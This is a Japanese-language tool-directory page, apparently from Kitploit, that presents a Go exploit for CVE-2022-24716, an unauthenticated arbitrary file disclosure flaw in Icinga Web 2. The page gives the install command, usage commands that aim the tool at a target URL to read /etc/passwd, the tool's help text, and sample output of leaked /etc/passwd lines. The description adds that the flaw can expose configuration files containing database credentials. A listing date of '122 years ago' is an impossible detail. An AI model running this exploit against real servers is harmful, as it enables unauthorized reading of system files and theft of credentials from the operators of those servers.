Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/gmh5225/cve-2022-24716-2
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubgmh5225/cve-2022-24716-2

CVE-2022-24716-2

CVE-2022-24716 (任意のファイル開示 Icingaweb2)

リポジトリを見る
122年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-24716

Icinga Web 2 は、オープンソースの監視ウェブインターフェース、フレームワーク、コマンドラインインターフェースです。認証されていないユーザーが、ウェブサーバーからユーザーアクセス可能なローカルシステムファイルの内容を漏洩させる可能性があります。これには、データベースの認証情報を含む icingaweb2 の設定ファイルも含まれます。

  • インストール
  • 使用方法
  • CVE-2022-24716 の実行

インストール

CVE-2022-24716 には golang が必要です。ダウンロードは以下のコマンドを使用します:

root@kitploit:~
go install -v github.com/joaoviictorti/CVE-2022-24716@latest

使用方法

root@kitploit:~
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd 
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080

これにより、ツールのヘルプが表示されます。以下はサポートされているすべてのスイッチです:

root@kitploit:~
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
                      [-p|--proxy "<value>"]

                      CVE-2022-24716 - 任意のファイル開示

Arguments:

  -h  --help   ヘルプ情報を表示
  -u  --url   URL を指定
  -f  --file   ファイルを指定
  -p  --proxy  プロキシを指定

CVE-2022-24716 の実行

root@kitploit:~
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
ツールをダウンロード